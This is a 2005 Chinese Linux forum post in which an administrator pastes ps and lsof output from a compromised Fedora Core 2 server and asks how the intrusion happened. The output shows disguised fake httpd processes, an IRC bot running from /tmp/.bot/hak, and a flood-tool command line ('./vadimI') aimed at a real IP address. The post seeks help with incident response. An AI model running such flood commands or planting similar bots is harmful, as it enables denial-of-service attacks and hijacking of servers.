Fedora Core 2主机被入侵，想知道对方怎么做到的

seedpig · 发表于 2005-6-21 11:42:26

一年前安装的Fedora Core 2，yum升级到最新，今天发现ps -afx里出现异常的进程，该进程连接到ircd，显然是个木马，以下是ps和lsof的输出(被替换过？),但硬盘上并没有/usr/local/apache/bin/httpd这个文件，想知道对方是怎么做到的，那位大虾能指教一下？

[root@himalaya root]# ps -afx
Warning: bad syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
  PID TTY    STAT TIME COMMAND
1 ?       S    0:01 init [3]
2 ?       SWN 0:05 [ksoftirqd/0]
3 ?       SW< 1:14 [events/0]
4 ?       SW< 0:00  \_ [khelper]
16 ?       SW< 0:00  \_ [kacpid]
86 ?       SW< 0:05  \_ [kblockd/0]
  148 ?       SW    0:04  \_ [pdflush]
  149 ?       SW    0:04  \_ [pdflush]
  151 ?       SW< 0:00  \_ [aio/0]
94 ?       SW    0:00 [khubd]
  150 ?       SW    1:15 [kswapd0]
  243 ?       SW    0:00 [kseriod]
  447 ?       SW    0:00 [scsi_eh_0]
  450 ?       SW    0:00 [scsi_eh_1]
  480 ?       SW    0:10 [kjournald]
1504 ?       SW    0:24 [kjournald]
1505 ?       SW    6:16 [kjournald]
1506 ?       SW    0:04 [kjournald]
1507 ?       SW    0:29 [kjournald]
1508 ?       SW    0:00 [kjournald]
1509 ?       SW    0:00 [kjournald]
2512 ?       S    9:01 syslogd -m 0
2516 ?       S    0:00 klogd -x
2526 ?       S    0:00 /usr/sbin/courierlogger -pid=/var/spool/authdaemon/pid -start /usr/libexec/courier-authlib/authdaem
2527 ?       S    0:00  \_ /usr/libexec/courier-authlib/authdaemond
2528 ?       S    0:00    \_ /usr/libexec/courier-authlib/authdaemond
2529 ?       S    0:00    \_ /usr/libexec/courier-authlib/authdaemond
2530 ?       S    0:00    \_ /usr/libexec/courier-authlib/authdaemond
2531 ?       S    0:00    \_ /usr/libexec/courier-authlib/authdaemond
2532 ?       S    0:00    \_ /usr/libexec/courier-authlib/authdaemond
2569 ?       S    0:00 rpc.idmapd
2655 ?       S    0:00 /usr/sbin/acpid
2666 ?       S    27:45 /usr/sbin/named -u named -t /var/named/chroot
2722 ?       S    0:12 /usr/sbin/sshd
21628 ?       S    0:00  \_ sshd: jedi [priv]
21664 ?       S    0:00    \_ sshd: jedi@pts/0
21665 pts/0 S    0:00       \_ -bash
21700 pts/0 S    0:00             \_ su -
21701 pts/0 S    0:00                \_ -bash
29139 pts/0 R    0:00                   \_ ps -afx
2737 ?       S    0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
2747 ?       S    0:00 vsftpd: LISTENER
2810 ?       S    0:00 /usr/lib/courier-imap/sbin/courierlogger -pid=/var/run/authdaemon.courier-imap/pid -start /usr/lib/
2811 ?       S    0:00  \_ /usr/lib/courier-imap/libexec/authlib/authdaemond.mysql
2815 ?       S    3:11    \_ /usr/lib/courier-imap/libexec/authlib/authdaemond.mysql
2816 ?       S    3:10    \_ /usr/lib/courier-imap/libexec/authlib/authdaemond.mysql
2817 ?       S    3:06    \_ /usr/lib/courier-imap/libexec/authlib/authdaemond.mysql
2818 ?       S    3:08    \_ /usr/lib/courier-imap/libexec/authlib/authdaemond.mysql
2819 ?       S    3:12    \_ /usr/lib/courier-imap/libexec/authlib/authdaemond.mysql
2821 ?       S    0:10 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/sbin/couri
14228 ?       S    0:01  \_ /usr/lib/courier-imap/bin/imapd Maildir
29058 ?       S    0:00  \_ /usr/lib/courier-imap/bin/imapd Maildir
2823 ?       S    0:40 /usr/lib/courier-imap/sbin/courierlogger imapd
2834 ?       S    0:00 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/sbin/couri
2836 ?       S    0:00 /usr/lib/courier-imap/sbin/courierlogger imapd-ssl
2845 ?       S    2:08 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/sbin/couri
22615 ?       S    0:00  \_ /usr/lib/courier-imap/bin/pop3d Maildir
26627 ?       S    0:00  \_ /usr/lib/courier-imap/bin/pop3d Maildir
27386 ?       S    0:00  \_ /usr/lib/courier-imap/bin/pop3d Maildir
28255 ?       S    0:00  \_ /usr/lib/courier-imap/bin/pop3d Maildir
28632 ?       S    0:00  \_ /usr/lib/courier-imap/bin/pop3d Maildir
28949 ?       S    0:00  \_ /usr/lib/courier-imap/bin/pop3d Maildir
29002 ?       S    0:00  \_ /usr/lib/courier-imap/bin/pop3d Maildir
29071 ?       S    0:00  \_ /usr/lib/courier-imap/bin/pop3d Maildir
29122 ?       S    0:00  \_ /usr/lib/courier-imap/sbin/pop3login /usr/lib/courier-imap/libexec/authlib/authdaemon /usr/lib/
2847 ?       S    1:59 /usr/lib/courier-imap/sbin/courierlogger pop3d
2857 ?       S    0:00 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/sbin/couri
2859 ?       S    0:00 /usr/lib/courier-imap/sbin/courierlogger pop3d-ssl
2909 ?       S    4:54 /usr/libexec/postfix/master
2921 ?       S    1:09  \_ nqmgr -l -n qmgr -t fifo -u
10234 ?       S    0:05  \_ trivial-rewrite -n rewrite -t unix -u
18548 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
21070 ?       S    0:00  \_ cleanup -z -t unix -u
22547 ?       S    0:00  \_ pickup -l -t fifo -u
23692 ?       S    0:00  \_ cleanup -z -t unix -u
24030 ?       S    0:00  \_ cleanup -z -t unix -u
24037 ?       S    0:01  \_ smtpd -n smtp -t inet -u -s 2
24041 ?       S    0:00  \_ cleanup -z -t unix -u
24078 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
24087 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
24156 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
24378 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
24407 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
24495 ?       S    0:00  \_ cleanup -z -t unix -u
24587 ?       S    0:00  \_ cleanup -z -t unix -u
24626 ?       S    0:00  \_ cleanup -z -t unix -u
24679 ?       S    0:01  \_ smtpd -n smtp -t inet -u -s 2
25980 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
26042 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
26052 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
26059 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
26233 ?       S    0:00  \_ cleanup -z -t unix -u
26266 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
26269 ?       S    0:00  \_ cleanup -z -t unix -u
26270 ?       S    0:00  \_ cleanup -z -t unix -u
26304 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
26315 ?       S    0:00  \_ virtual -t unix
26466 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
26470 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
26471 ?       S    0:00  \_ cleanup -z -t unix -u
26472 ?       S    0:00  \_ cleanup -z -t unix -u
26475 ?       S    0:00  \_ cleanup -z -t unix -u
26530 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
26796 ?       S    0:00  \_ cleanup -z -t unix -u
26848 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
26853 ?       S    0:00  \_ smtpd -n smtp -t inet -u -s 2
26855 ?       S    0:00  \_ cleanup -z -t unix -u
28209 ?       S    0:00  \_ smtp -t unix -u
28530 ?       S    0:00  \_ smtp -t unix -u
28531 ?       S    0:00  \_ smtp -t unix -u
2919 ?       S    0:00 gpm -m /dev/input/mice -t imps2
2965 ?       S    0:00 /usr/sbin/pptpd
3000 ?       S    0:00 /usr/sbin/htt
3001 ?       S    0:00  \_ htt_server -nodaemon
3012 ?       S    0:00 crond
3026 ?       S    0:00 squid -D
3028 ?       S    0:54  \_ (squid) -D
3030 ?       S    0:00    \_ (unlinkd)
3054 ?       S    0:00 xfs -droppriv -daemon
3064 ?       S    0:00 smbd -D
3066 ?       S    0:00  \_ smbd -D
3069 ?       S    8:43 nmbd -D
3088 ?       S    0:00 /usr/sbin/atd
3098 ?       S    0:55 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam
3126 ?       S    0:55  \_ /usr/sbin/saslauthd -m /var/run/saslauthd -a pam
3127 ?       S    0:54  \_ /usr/sbin/saslauthd -m /var/run/saslauthd -a pam
3128 ?       S    0:54  \_ /usr/sbin/saslauthd -m /var/run/saslauthd -a pam
3129 ?       S    0:55  \_ /usr/sbin/saslauthd -m /var/run/saslauthd -a pam
3108 ?       S    0:00 dbus-daemon-1 --system
3121 tty2    S    0:00 /sbin/mingetty tty2
3122 tty3    S    0:00 /sbin/mingetty tty3
3123 tty4    S    0:00 /sbin/mingetty tty4
3124 tty5    S    0:00 /sbin/mingetty tty5
3125 tty6    S    0:00 /sbin/mingetty tty6
1048 ?       S    0:00 login -- root
1163 tty1    S    0:00  \_ -bash
18459 ?       S    0:00 /bin/sh /usr/bin/safe_mysqld --defaults-file=/etc/my.cnf --pid-file=/var/run/mysqld/mysqld.pid
18488 ?       S    4:14  \_ /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=
27853 ?       R 6327:45 /usr/local/apache/bin/httpd -DSSL
24563 ?       S    0:04 sshd
21307 ?       S    0:00 bash
21315 ?       S    0:00 bash
21325 ?       S    0:01 bash
7179 ?       S    0:03 /usr/sbin/httpd
9851 ?       S    0:13  \_ /usr/sbin/httpd
9852 ?       S    0:14  \_ /usr/sbin/httpd
9853 ?       S    0:14  \_ /usr/sbin/httpd
9854 ?       S    0:13  \_ /usr/sbin/httpd
9855 ?       S    0:13  \_ /usr/sbin/httpd
9856 ?       S    0:13  \_ /usr/sbin/httpd
9857 ?       S    0:13  \_ /usr/sbin/httpd
9858 ?       S    0:13  \_ /usr/sbin/httpd
13668 ?       S    0:11  \_ /usr/sbin/httpd
25366 ?       S    0:02  \_ /usr/sbin/httpd
25560 ?       S    0:02  \_ /usr/sbin/httpd
##我的主机没有这个路径的
4708 ?       S    0:00 /usr/local/apache/bin/httpd -DSSL
4709 ?       S    0:00  \_ sh -c ./vadimI 193.178.237.198 53 yahoo.com 2>&1 3>&1
4710 ?       R 486:35    \_ ./vadimI 193.178.237.198 53 yahoo.com
6976 ?       S    0:00 /usr/local/apache/bin/httpd -DSSL
6980 ?       S    0:00 ./m
7070 ?       S    0:00 /usr/local/apache/bin/httpd -DSSL
7073 ?       T    0:00 ./m
7074 ?       Z    0:00  \_ [m] <defunct>
7075 ?       S    0:00 ./m

[root@himalaya root]# ps -aux
Warning: bad syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
USER    PID %CPU %MEM VSZ  RSS TTY    STAT START TIME COMMAND
root       1  0.0  0.0  1672  464 ?       S Jun05 0:01 init [3]
root       2  0.0  0.0    0 0 ?       SWN  Jun05 0:05 [ksoftirqd/0]
root       3  0.0  0.0    0 0 ?       SW<  Jun05 1:14 [events/0]
root       4  0.0  0.0    0 0 ?       SW<  Jun05 0:00 [khelper]
root       16  0.0  0.0    0 0 ?       SW<  Jun05 0:00 [kacpid]
root       86  0.0  0.0    0 0 ?       SW<  Jun05 0:05 [kblockd/0]
root       94  0.0  0.0    0 0 ?       SW Jun05 0:00 [khubd]
root    148  0.0  0.0    0 0 ?       SW Jun05 0:04 [pdflush]
root    149  0.0  0.0    0 0 ?       SW Jun05 0:04 [pdflush]
root    151  0.0  0.0    0 0 ?       SW<  Jun05 0:00 [aio/0]
root    150  0.0  0.0    0 0 ?       SW Jun05 1:15 [kswapd0]
root    243  0.0  0.0    0 0 ?       SW Jun05 0:00 [kseriod]
root    447  0.0  0.0    0 0 ?       SW Jun05 0:00 [scsi_eh_0]
root    450  0.0  0.0    0 0 ?       SW Jun05 0:00 [scsi_eh_1]
root    480  0.0  0.0    0 0 ?       SW Jun05 0:10 [kjournald]
root    1504  0.0  0.0    0 0 ?       SW Jun05 0:24 [kjournald]
root    1505  0.0  0.0    0 0 ?       SW Jun05 6:17 [kjournald]
root    1506  0.0  0.0    0 0 ?       SW Jun05 0:04 [kjournald]
root    1507  0.0  0.0    0 0 ?       SW Jun05 0:29 [kjournald]
root    1508  0.0  0.0    0 0 ?       SW Jun05 0:00 [kjournald]
root    1509  0.0  0.0    0 0 ?       SW Jun05 0:00 [kjournald]
root    2512  0.0  0.1  3240  568 ?       S Jun05 9:02 syslogd -m 0
root    2516  0.0  0.0  2720  444 ?       S Jun05 0:00 klogd -x
root    2526  0.0  0.0  2632  360 ?       S Jun05 0:00 /usr/sbin/courierlogger -pid=/var/spool/authdaemon/pid -start /
root    2527  0.0  0.2  6656 1368 ?       S Jun05 0:00 /usr/libexec/courier-authlib/authdaemond
root    2528  0.0  0.2  6656 1372 ?       S Jun05 0:00 /usr/libexec/courier-authlib/authdaemond
root    2529  0.0  0.2  6656 1372 ?       S Jun05 0:00 /usr/libexec/courier-authlib/authdaemond
root    2530  0.0  0.2  6656 1372 ?       S Jun05 0:00 /usr/libexec/courier-authlib/authdaemond
root    2531  0.0  0.2  6656 1372 ?       S Jun05 0:00 /usr/libexec/courier-authlib/authdaemond
root    2532  0.0  0.2  6656 1372 ?       S Jun05 0:00 /usr/libexec/courier-authlib/authdaemond
root    2569  0.0  0.1  2532  560 ?       S Jun05 0:00 rpc.idmapd
root    2655  0.0  0.0  2604  464 ?       S Jun05 0:00 /usr/sbin/acpid
named    2666  0.1  1.5 42232 7764 ?       S Jun05  27:47 /usr/sbin/named -u named -t /var/named/chroot
root    2722  0.0  0.2  5372 1452 ?       S Jun05 0:12 /usr/sbin/sshd
root    2737  0.0  0.1  2748  904 ?       S Jun05 0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root    2747  0.0  0.0  2988  512 ?       S Jun05 0:00 vsftpd: LISTENER
root    2810  0.0  0.0  1608  360 ?       S Jun05 0:00 /usr/lib/courier-imap/sbin/courierlogger -pid=/var/run/authdaem
root    2811  0.0  0.1  3468  544 ?       S Jun05 0:00 /usr/lib/courier-imap/libexec/authlib/authdaemond.mysql
root    2815  0.0  0.1  3516  892 ?       S Jun05 3:12 /usr/lib/courier-imap/libexec/authlib/authdaemond.mysql
root    2816  0.0  0.1  3516  892 ?       S Jun05 3:11 /usr/lib/courier-imap/libexec/authlib/authdaemond.mysql
root    2817  0.0  0.1  3516  892 ?       S Jun05 3:07 /usr/lib/courier-imap/libexec/authlib/authdaemond.mysql
root    2818  0.0  0.1  3516  872 ?       S Jun05 3:09 /usr/lib/courier-imap/libexec/authlib/authdaemond.mysql
root    2819  0.0  0.1  3516  888 ?       S Jun05 3:13 /usr/lib/courier-imap/libexec/authlib/authdaemond.mysql
root    2821  0.0  0.0  1644  508 ?       S Jun05 0:10 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlog
root    2823  0.0  0.0  2864  348 ?       S Jun05 0:40 /usr/lib/courier-imap/sbin/courierlogger imapd
root    2834  0.0  0.0  3488  508 ?       S Jun05 0:00 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlog
root    2836  0.0  0.0  3204  208 ?       S Jun05 0:00 /usr/lib/courier-imap/sbin/courierlogger imapd-ssl
root    2845  0.0  0.0  2564  508 ?       S Jun05 2:08 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlog
root    2847  0.0  0.0  2136  348 ?       S Jun05 1:59 /usr/lib/courier-imap/sbin/courierlogger pop3d
root    2857  0.0  0.0  2972  508 ?       S Jun05 0:00 /usr/lib/courier-imap/libexec/couriertcpd -address=0 -stderrlog
root    2859  0.0  0.0  1980  212 ?       S Jun05 0:00 /usr/lib/courier-imap/sbin/courierlogger pop3d-ssl
root    2909  0.0  0.2  5712 1540 ?       S Jun05 4:54 /usr/libexec/postfix/master
root    2919  0.0  0.0  2948  468 ?       S Jun05 0:00 gpm -m /dev/input/mice -t imps2
postfix 2921  0.0  0.3  6792 1800 ?       S Jun05 1:09 nqmgr -l -n qmgr -t fifo -u
root    2965  0.0  0.1  3360  620 ?       S Jun05 0:00 /usr/sbin/pptpd
htt    3000  0.0  0.0  2332  260 ?       S Jun05 0:00 /usr/sbin/htt
htt    3001  0.0  0.2  4812 1452 ?       S Jun05 0:00 htt_server -nodaemon
root    3012  0.0  0.1  2816  640 ?       S Jun05 0:00 crond
root    3026  0.0  0.3  6516 1752 ?       S Jun05 0:00 squid -D
squid    3028  0.0  5.3 31812 27472 ?    S Jun05 0:54 (squid) -D
squid    3030  0.0  0.0  1384  280 ?       S Jun05 0:00 (unlinkd)
xfs    3054  0.0  0.5  5164 3020 ?       S Jun05 0:00 xfs -droppriv -daemon
root    3064  0.0  0.4 11428 2404 ?       S Jun05 0:00 smbd -D
root    3066  0.0  0.4 11424 2368 ?       S Jun05 0:00 smbd -D
root    3069  0.0  0.6  9976 3252 ?       S Jun05 8:44 nmbd -D
daemon 3088  0.0  0.1  2352  608 ?       S Jun05 0:00 /usr/sbin/atd
root    3098  0.0  3.6 22624 18712 ?    S Jun05 0:55 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam
dbus    3108  0.0  0.1  3104  808 ?       S Jun05 0:00 dbus-daemon-1 --system
root    3121  0.0  0.0  1768  344 tty2    S Jun05 0:00 /sbin/mingetty tty2
root    3122  0.0  0.0  2908  340 tty3    S Jun05 0:00 /sbin/mingetty tty3
root    3123  0.0  0.0  2928  340 tty4    S Jun05 0:00 /sbin/mingetty tty4
root    3124  0.0  0.0  1976  344 tty5    S Jun05 0:00 /sbin/mingetty tty5
root    3125  0.0  0.0  1992  340 tty6    S Jun05 0:00 /sbin/mingetty tty6
root    3126  0.0  3.6 22612 18692 ?    S Jun05 0:55 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam
root    3127  0.0  3.6 22584 18676 ?    S Jun05 0:54 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam
root    3128  0.0  3.6 22524 18652 ?    S Jun05 0:54 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam
root    3129  0.0  3.6 22560 18680 ?    S Jun05 0:55 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam
root    1048  0.0  0.2  4176 1120 ?       S Jun06 0:00 login -- root
root    1163  0.0  0.2  4836 1372 tty1    S Jun06 0:00 -bash
root    18459  0.0  0.1  5428  952 ?       S Jun16 0:00 /bin/sh /usr/bin/safe_mysqld --defaults-file=/etc/my.cnf --pid-
mysql 18488  0.0  2.0 42808 10656 ?    S Jun16 4:15 /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr
apache 27853 90.2  0.6  5928 3592 ?       R Jun16 6334:36 /usr/local/apache/bin/httpd -DSSL
##开了sshd和bash进程
apache 24563  0.0  0.2  2060 1052 ?       S Jun19 0:04 sshd
apache 21307  0.0  0.1  1756  784 ?       S Jun20 0:00 bash
apache 21315  0.0  0.1  1756  816 ?       S Jun20 0:00 bash
apache 21325  0.0  0.1  1756  832 ?       S Jun20 0:01 bash
root    7179  0.0  2.4 26152 12632 ?    S Jun20 0:03 /usr/sbin/httpd
apache 4708  0.0  0.6  5928 3608 ?       S Jun20 0:00 /usr/local/apache/bin/httpd -DSSL
apache 4709  0.0  0.1  3232  964 ?       S Jun20 0:00 sh -c ./vadimI 193.178.237.198 53 yahoo.com 2>&1 3>&1
apache 4710 49.3  0.0  1460  420 ?       R Jun20 493:26 ./vadimI 193.178.237.198 53 yahoo.com
apache 6976  0.0  0.6  5928 3608 ?       S Jun20 0:00 /usr/local/apache/bin/httpd -DSSL
apache 6980  0.0  0.1  1796  808 ?       S Jun20 0:00 ./m
apache 7070  0.0  0.6  5928 3608 ?       S Jun20 0:00 /usr/local/apache/bin/httpd -DSSL
apache 7073  0.0  0.0  1516  224 ?       T Jun20 0:00 ./m
apache 7074  0.0  0.0    0 0 ?       Z Jun20 0:00 [m] <defunct>
apache 7075  0.0  0.2  2060 1104 ?       S Jun20 0:00 ./m
apache 9851  0.0  3.4 31236 17952 ?    S 04:12 0:13 /usr/sbin/httpd
apache 9852  0.0  3.3 30816 17396 ?    S 04:12 0:15 /usr/sbin/httpd
apache 9853  0.0  3.4 31052 17652 ?    S 04:12 0:15 /usr/sbin/httpd
apache 9854  0.0  3.4 31160 17772 ?    S 04:12 0:13 /usr/sbin/httpd
apache 9855  0.0  3.4 31060 17592 ?    S 04:12 0:14 /usr/sbin/httpd
apache 9856  0.0  3.3 30788 17320 ?    S 04:12 0:14 /usr/sbin/httpd
apache 9857  0.0  3.3 30752 17348 ?    S 04:12 0:14 /usr/sbin/httpd
apache 9858  0.0  3.4 31260 17848 ?    S 04:12 0:14 /usr/sbin/httpd
postfix  10234  0.0  0.4  7800 2112 ?       S 05:04 0:05 trivial-rewrite -n rewrite -t unix -u
apache 13668  0.1  3.3 30852 17516 ?    S 09:13 0:12 /usr/sbin/httpd
apache 14228  0.0  0.2  3776 1056 ?       S 09:17 0:01 /usr/lib/courier-imap/bin/imapd Maildir
postfix  18548  0.0  0.5  7784 2672 ?       S 09:54 0:00 smtpd -n smtp -t inet -u -s 2
postfix  21070  0.0  0.3  7664 2028 ?       S 10:15 0:00 cleanup -z -t unix -u
root    21628  0.0  0.4  9020 2088 ?       S 10:20 0:00 sshd: jedi [priv]
jedi    21664  0.0  0.4  9164 2296 ?       S 10:20 0:00 sshd: jedi@pts/0
jedi    21665  0.0  0.2  4776 1364 pts/0 S 10:20 0:00 -bash
root    21700  0.0  0.2  5676 1064 pts/0 S 10:20 0:00 su -
root    21701  0.0  0.2  4528 1400 pts/0 S 10:20 0:00 -bash
postfix  22547  0.0  0.2  6464 1544 ?       S 10:28 0:00 pickup -l -t fifo -u
postfix  23692  0.0  0.3  6140 2028 ?       S 10:37 0:00 cleanup -z -t unix -u
postfix  24030  0.0  0.3  6540 2024 ?       S 10:40 0:00 cleanup -z -t unix -u
postfix  24037  0.0  0.5  8292 2648 ?       S 10:40 0:01 smtpd -n smtp -t inet -u -s 2
postfix  24041  0.0  0.3  7836 2028 ?       S 10:40 0:00 cleanup -z -t unix -u
postfix  24078  0.0  0.5  8060 2664 ?       S 10:41 0:00 smtpd -n smtp -t inet -u -s 2
postfix  24087  0.0  0.5  7864 2652 ?       S 10:41 0:00 smtpd -n smtp -t inet -u -s 2
postfix  24156  0.0  0.5  7388 2672 ?       S 10:41 0:00 smtpd -n smtp -t inet -u -s 2
postfix  24378  0.0  0.5  8368 2648 ?       S 10:42 0:00 smtpd -n smtp -t inet -u -s 2
postfix  24407  0.0  0.5  8200 2624 ?       S 10:42 0:00 smtpd -n smtp -t inet -u -s 2
postfix  24495  0.0  0.3  6900 2028 ?       S 10:43 0:00 cleanup -z -t unix -u
postfix  24587  0.0  0.3  6700 2020 ?       S 10:44 0:00 cleanup -z -t unix -u
postfix  24626  0.0  0.3  7636 2024 ?       S 10:44 0:00 cleanup -z -t unix -u
postfix  24679  0.0  0.5  8312 2664 ?       S 10:45 0:01 smtpd -n smtp -t inet -u -s 2
apache 25366  0.1  3.3 30512 17028 ?    S 10:51 0:02 /usr/sbin/httpd
apache 25560  0.1  3.3 30676 17248 ?    S 10:52 0:03 /usr/sbin/httpd
postfix  25980  0.0  0.5  7208 2652 ?       S 10:55 0:00 smtpd -n smtp -t inet -u -s 2
postfix  26042  0.0  0.5  7236 2628 ?       S 10:55 0:00 smtpd -n smtp -t inet -u -s 2
postfix  26052  0.0  0.5  8308 2656 ?       S 10:56 0:00 smtpd -n smtp -t inet -u -s 2
postfix  26059  0.0  0.5  7512 2628 ?       S 10:56 0:00 smtpd -n smtp -t inet -u -s 2
postfix  26233  0.0  0.3  5912 2024 ?       S 10:57 0:00 cleanup -z -t unix -u
postfix  26266  0.0  0.5  8544 2640 ?       S 10:58 0:00 smtpd -n smtp -t inet -u -s 2
postfix  26269  0.0  0.3  6156 2028 ?       S 10:58 0:00 cleanup -z -t unix -u
postfix  26270  0.0  0.4  6840 2064 ?       S 10:58 0:00 cleanup -z -t unix -u
postfix  26304  0.0  0.5  9016 2632 ?       S 10:58 0:00 smtpd -n smtp -t inet -u -s 2
postfix  26315  0.0  0.3  7404 1664 ?       S 10:58 0:00 virtual -t unix
postfix  26466  0.0  0.5  7812 2644 ?       S 10:59 0:00 smtpd -n smtp -t inet -u -s 2
postfix  26470  0.0  0.5  8872 2632 ?       S 10:59 0:00 smtpd -n smtp -t inet -u -s 2
postfix  26471  0.0  0.3  6788 2024 ?       S 10:59 0:00 cleanup -z -t unix -u
postfix  26472  0.0  0.3  6916 2024 ?       S 10:59 0:00 cleanup -z -t unix -u
postfix  26475  0.0  0.3  5972 2024 ?       S 10:59 0:00 cleanup -z -t unix -u
postfix  26530  0.0  0.5  7360 2636 ?       S 10:59 0:00 smtpd -n smtp -t inet -u -s 2
postfix  26796  0.0  0.3  5940 2024 ?       S 11:00 0:00 cleanup -z -t unix -u
postfix  26848  0.0  0.5  9016 2644 ?       S 11:01 0:00 smtpd -n smtp -t inet -u -s 2
postfix  26853  0.0  0.5  7472 2608 ?       S 11:01 0:00 smtpd -n smtp -t inet -u -s 2
postfix  26855  0.0  0.3  6784 2056 ?       S 11:01 0:00 cleanup -z -t unix -u
apache 27386  0.0  0.0  3460  420 ?       S 11:04 0:00 /usr/lib/courier-imap/bin/pop3d Maildir
apache 28949  0.0  0.0  3244  420 ?       S 11:16 0:00 /usr/lib/courier-imap/bin/pop3d Maildir
apache 29002  0.0  0.0  3436  420 ?       S 11:17 0:00 /usr/lib/courier-imap/bin/pop3d Maildir
apache 29071  0.0  0.1  1984  516 ?       S 11:17 0:00 /usr/lib/courier-imap/bin/pop3d Maildir
apache 29850  0.0  0.0  2308  412 ?       S 11:23 0:00 /usr/lib/courier-imap/bin/pop3d Maildir
apache 30612  0.0  0.0  1704  416 ?       S 11:28 0:00 /usr/lib/courier-imap/bin/pop3d Maildir
apache 30624  0.0  0.0  1976  408 ?       S 11:28 0:00 /usr/lib/courier-imap/bin/pop3d Maildir
postfix  30652  0.0  0.3  7656 1724 ?       S 11:29 0:00 smtp -t unix -u
postfix  30653  0.0  0.3  7008 1692 ?       S 11:29 0:00 smtp -t unix -u
apache 30790  0.1  3.2 30232 16656 ?    S 11:30 0:00 /usr/sbin/httpd
apache 30811  0.0  0.1  3432  872 ?       S 11:30 0:00 /usr/lib/courier-imap/bin/imapd Maildir
apache 30837  0.0  0.0  2864  412 ?       S 11:30 0:00 /usr/lib/courier-imap/bin/pop3d Maildir
apache 30881  0.1  0.0  2576  420 ?       S 11:31 0:00 /usr/lib/courier-imap/bin/pop3d Maildir
apache 30898  0.0  0.0  2888  420 ?       S 11:31 0:00 /usr/lib/courier-imap/bin/pop3d Maildir
apache 30910  0.1  3.0 29384 15712 ?    S 11:31 0:00 /usr/sbin/httpd
root    30988  0.0  0.0  3864  360 ?       S 11:32 0:00 /usr/lib/courier-imap/sbin/pop3login /usr/lib/courier-imap/libe
apache 31007  0.0  0.1  3660  872 ?       S 11:32 0:00 /usr/lib/courier-imap/bin/imapd Maildir
root    31011  0.0  0.1  2824  744 pts/0 R 11:32 0:00 ps -aux

[root@himalaya root]# lsof |grep "^m "
m       6980  apache  cwd DIR       8,1    4096    409754 /tmp/.bot/hak
m       6980  apache  rtd DIR       8,1    4096       2 /
m       6980  apache  txt REG       8,1 472230    409763 /tmp/.bot/hak/m
m       6980  apache  mem REG       8,1 22172    440686 /lib/libnss_dns-2.3.3.so
m       6980  apache  mem REG       8,1 106916    440937 /lib/ld-2.3.3.so
m       6980  apache  mem REG       8,1  1459344    440938 /lib/tls/libc-2.3.3.so
m       6980  apache  mem REG       8,1 76652    440945 /lib/libresolv-2.3.3.so
m       6980  apache  mem REG       8,1 50944    440689 /lib/libnss_files-2.3.3.so
m       6980  apache 0w REG       8,1    3615    409765 /tmp/.bot/hak/LinkEvents
m       6980  apache 1u  IPv4 5563311                TCP host-211-144-35-21.lingtu.com:38100->London2.UK.EU.undernet.org:ircd (ESTABLISHED)
m       6980  apache 3w  FIFO       0,5          5470023 pipe
m       6980  apache 4u  IPv4 5470026                UDP *:42930
m       6980  apache 22u  unix 0xc49384c0          4006028 socket
m       7073  apache  cwd DIR       8,1    4096    310081 /bin
m       7073  apache  rtd DIR       8,1    4096       2 /
m       7073  apache  txt REG       8,1 472230    409763 /tmp/.bot/hak/m
m       7073  apache  mem REG       8,1 106916    440937 /lib/ld-2.3.3.so
m       7073  apache  mem REG       8,1  1459344    440938 /lib/tls/libc-2.3.3.so
m       7073  apache 0r  FIFO       0,5          4148873 pipe
m       7073  apache 1w  FIFO       0,5          5471032 pipe
m       7073  apache 2w  FIFO       0,5          5471032 pipe
m       7073  apache 3w  FIFO       0,5          5471032 pipe
m       7073  apache 4r DIR       8,1    4096    409754 /tmp/.bot/hak
m       7073  apache 5r DIR       8,1    4096    310081 /bin
m       7073  apache 22u  unix 0xc49384c0          4006028 socket
m       7075  apache  cwd DIR       8,1    4096    409754 /tmp/.bot/hak
m       7075  apache  rtd DIR       8,1    4096       2 /
m       7075  apache  txt REG       8,1 472230    409763 /tmp/.bot/hak/m
m       7075  apache  mem REG       8,1 22172    440686 /lib/libnss_dns-2.3.3.so
m       7075  apache  mem REG       8,1 106916    440937 /lib/ld-2.3.3.so
m       7075  apache  mem REG       8,1  1459344    440938 /lib/tls/libc-2.3.3.so
m       7075  apache  mem REG       8,1 76652    440945 /lib/libresolv-2.3.3.so
m       7075  apache  mem REG       8,1 50944    440689 /lib/libnss_files-2.3.3.so
m       7075  apache 0w REG       8,1    3615    409765 /tmp/.bot/hak/LinkEvents
